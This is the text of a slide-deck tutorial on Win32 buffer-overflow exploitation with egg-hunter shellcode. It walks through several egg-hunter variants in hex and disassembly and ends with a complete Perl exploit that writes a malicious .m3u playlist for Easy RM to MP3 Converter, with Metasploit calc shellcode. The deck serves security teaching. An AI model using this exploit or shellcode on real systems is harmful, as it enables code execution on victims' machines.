SlideShare a Scribd company logo

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

sanghwan ahn
sanghwan ahn

System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Software
1 of 83
Download to read offline
System Hacking & Reverse Engineering documented by h2spice h2spice@gmail.com [ Buffer Overflow - Egg Hunting ]
Who am I Sanghwan,Ahn (h2spice) Works for LINE.Corp Carrying out research on the vulnerability (exploitation,hunt,analysis)
시스템 해킹 / 리버싱 Buffer Overflow 취약점 원리 Stack Overflow Heap Overflow Format String Bug Heap Overflow Use After Free Overwriting RET Overwriting SEH 익스플로잇(Win32/*NIX/ARM) Egg Hunting RTL ROP Heap Spraying 커리큘럼 소개 취약점 / 악성코드 분석 악성코드 분석 Software on X86 버그 헌팅 X86 ARM Mobile 취약점 분석 소스코드 분석 퍼징 CVE-XXXX-XXXX Exploit-DB Inj3ct0r - 1337day 리버스 엔지니어링 iOS Android Overwriting .dtors Overwriting GOT
목차 커리큘럼 소개 Track3 - Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROP Heap Spray Track3-2 *NIX Overwrite RET RTL Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET RTL ROP
Track3. Exploitation
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
What is the Egg-Hunting ? 프로세스의 VAS(Virtual Address Space) 검색 기술 이용 공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용 (공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에) Egg Hunting 은 기본적으로 3가지의 코드로 구성 Egg Hunter Code Marker or Tag Arbitrary Shell Code Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag x77x30x30x74x77x30x30x74 (w00tw00t) Shell Code (Calc) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag (w00tw00t) + x77x30x30x74x77x30x30x74 Shell Code (Calc) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker " Store Marker’s Addr & Jump to there
Track3. Exploitation How to work Egg-Hunter Code ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter Code x66x81xCAxFFx0Fx42x52x6A x02x58xCDx2Ex3Cx05x5Ax74 xEFxB8 x77x30x30x74 (marker/tag: w00t) x8BxFAxAFx75xEAxAFx75xE7 xFFxE7 " Store Marker’s Addr & Jump to there Marker / Tag + Shell Code x77x30x30x74x77x30x30x74 (w00tw00t) x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c x4bx51x4fx47x50x43x31x4a x4bx51x59x4cx4bx46x54x4c x4bx43x31x4ax4ex50x31x49 x50x4cx59x4ex4cx4cx44x49 ! Search Memory & Find Marker # Execute Shell Code
Important in order for Egg-Hunting to work 사용자 입력값으로부터 프로그램의 흐름을 제어 you must be able to jump to (jmp, call, push/ret) & execute some shellcode Egg-Hunter Code는 예측 가능한 메모리 영역에 위치 egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it) Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치 you must prepend the final shell code with a unique string/marker/tag 메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인 (IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe ckAndAuditAlarm) you’ll have to test which technique to search memory works for a particular exploit 버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요 the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter” 최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc) the final shell code must be available somewhere in memory Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation Egg-Hunter using SEH injection Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-hunter Code using SEH injection EB21 jmp short 0x23 my $egghunter = "xebx21x59xb8". "w00t". “x51x6axffx33xdbx64x89x23". “x6ax02x59x8bxfbxf3xafx75". “x07xffxe7x66x81xcbxffx0f". “x43xebxedxe8xdaxffxffxff". “x6ax0cx59x8bx04x0cxb1xb8". “x83x04x08x06x58x83xc4x10". “x50x33xc0xc3"; 59 pop ecx B890509050 mov eax,0x50905090 ; this is the Marker 51 push ecx 6AFF push byte -0x1 33DB xor ebx,ebx 648923 mov [fs:ebx],esp 6A02 push byte +0x2 59 pop ecx 8BFB mov edi,ebx F3AF repe scasd 7507 jnz 0x20 FFE7 jmp edi 6681CBFF0F or bx,0xfff 43 inc ebx EBED jmp short 0x10 E8DAFFFFFF call 0x2 6A0C push byte +0xc 59 pop ecx 8B040C mov eax,[esp+ecx] B1B8 mov cl,0xb8 83040806 add dword [eax+ecx],byte +0x6 58 pop eax 83C410 add esp,byte+0x10 50 push eax 33C0 xor eax,eax C3 ret Egg hunter size = 60 bytes, Egg size = 8 bytes
Track3. Exploitation Egg-Hunter using SEH injection Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) EB21 jmp short 0x23 59 pop ecx B890509050 mov eax,0x50905090 ; this is the Marker 51 push ecx 6AFF push byte -0x1 33DB xor ebx,ebx 648923 mov [fs:ebx],esp 6A02 push byte +0x2 59 pop ecx 8BFB mov edi,ebx F3AF repe scasd 7507 jnz 0x20 FFE7 jmp edi 6681CBFF0F or bx,0xfff 43 inc ebx EBED jmp short 0x10 E8DAFFFFFF call 0x2 6A0C push byte +0xc 59 pop ecx 8B040C mov eax,[esp+ecx] B1B8 mov cl,0xb8 83040806 add dword [eax+ecx],byte +0x6 58 pop eax 83C410 add esp,byte+0x10 50 push eax 33C0 xor eax,eax C3 ret Egg-hunter Code using SEH injection ! Move marker to EAX Egg hunter size = 60 bytes, Egg size = 8 bytes my $egghunter = "xebx21x59xb8". "w00t". “x51x6axffx33xdbx64x89x23". “x6ax02x59x8bxfbxf3xafx75". “x07xffxe7x66x81xcbxffx0f". “x43xebxedxe8xdaxffxffxff". “x6ax0cx59x8bx04x0cxb1xb8". “x83x04x08x06x58x83xc4x10". “x50x33xc0xc3"; " Repeat until find the Marker
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using IsBadReadPtr Egg-hunter Code using IsBadReadPtr my $egghunter = “x33xdbx66x81". "xcbxffx0fx43x6ax08x53xb8". "x0dx5bxe7x77xffxd0x85xc0". "x75xecxb8". "w00t". “x8bxfbxafx75xe7xafx75xe4". "xffxe7"; 33DB xor ebx,ebx 6681CBFF0F or bx,0xfff 43 inc ebx 6A08 push byte +0x8 53 push ebx B80D5BE777 mov eax,0x77e75b0d FFD0 call eax 85C0 test eax,eax 75EC jnz 0x2 B890509050 mov eax,0x50905090 ; this is the Marker 8BFB mov edi,ebx AF scasd 75E7 jnz 0x7 AF scasd 75E4 jnz0x7 FFE7 jmp edi Egg hunter size = 37 bytes, Egg size = 8 bytes
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using IsBadReadPtr 33DB xor ebx,ebx 6681CBFF0F or bx,0xfff 43 inc ebx 6A08 push byte +0x8 53 push ebx B80D5BE777 mov eax,0x77e75b0d FFD0 call eax 85C0 test eax,eax 75EC jnz 0x2 B890509050 mov eax,0x50905090 ; this is the Marker 8BFB mov edi,ebx AF scasd 75E7 jnz 0x7 AF scasd 75E4 jnz0x7 FFE7 jmp edi ! Move marker to EAX " Repeat until find the Marker Egg hunter size = 37 bytes, Egg size = 8 bytes Egg-hunter Code using IsBadReadPtr my $egghunter = “x33xdbx66x81". "xcbxffx0fx43x6ax08x53xb8". "x0dx5bxe7x77xffxd0x85xc0". "x75xecxb8". "w00t". “x8bxfbxafx75xe7xafx75xe4". "xffxe7";
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtDisplayString Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x43x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A43 push byte +0x43 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtDisplayString 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A43 push byte +0x43 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi ! Move marker to EAX " Repeat until find the Marker Egg hunter size = 32 bytes, Egg size = 8 bytes Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x43x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7";
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x02x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A02 push byte +0x02 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다. NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) Egg-hunter Code using NtDisplayString my $egghunter = “x66x81xCAxFFx0Fx42x52x6A". "x02x58xCDx2Ex3Cx05x5Ax74". "xEFxB8". "w00t". “x8BxFAxAFx75xEAxAFx75xE7". "xFFxE7"; 6681CAFF0F or dx,0x0fff 42 inc edx 52 push edx 6A02 push byte +0x02 58 pop eax CD2E int 0x2e 3C05 cmp al,0x5 5A pop edx 74EF jz 0x0 B890509050 mov eax,0x50905090 ; this is the Marker 8BFA mov edi,edx AF scasd 75EA jnz 0x5 AF scasd 75E7 jnz 0x5 FFE7 jmp edi Egg hunter size = 32 bytes, Egg size = 8 bytes NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다. NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html ! Move marker to EAX " Repeat until find the Marker
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ! 메모리 검색을 시작할 위치 지정
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) " 다음 메모리 검색을 위해 주소 값을 증가
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) # 현재 가리키고 있는 주소값을 스택에 저장
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) $ NtAccessCheckAndAuditAlarm을 위해 0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) % 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) & EDX 값 복구
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ' 접근위반 발생시 시작점(0x12cd6c)로 이구동
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ( Marker 삽입 검색대상주소(EDX)를 EDI에 저장 Marker(EAX) 와 검색대상주소(EDI) 비교
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ) Marker 미 발견시 시작점(0x12cd6c)로 이동
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm)  Marker 발견시 해당 지점으로 이동 Final Shellcode
Exercise Time :D Target Info Win32 Easy RM to MP3 Converter v.2.7.3.700 Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Info .m3u Playlist File Format length of junk data is 26039 gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Code (EggHuntingExploit.pl) my $file= "EggHuntingExploit.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8". "x77x30x30x74". # this is the marker/tag: w00t "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"; # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = $padding . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE,">$file"); print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode; close($FILE); print "m3u File Created successfullyn"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
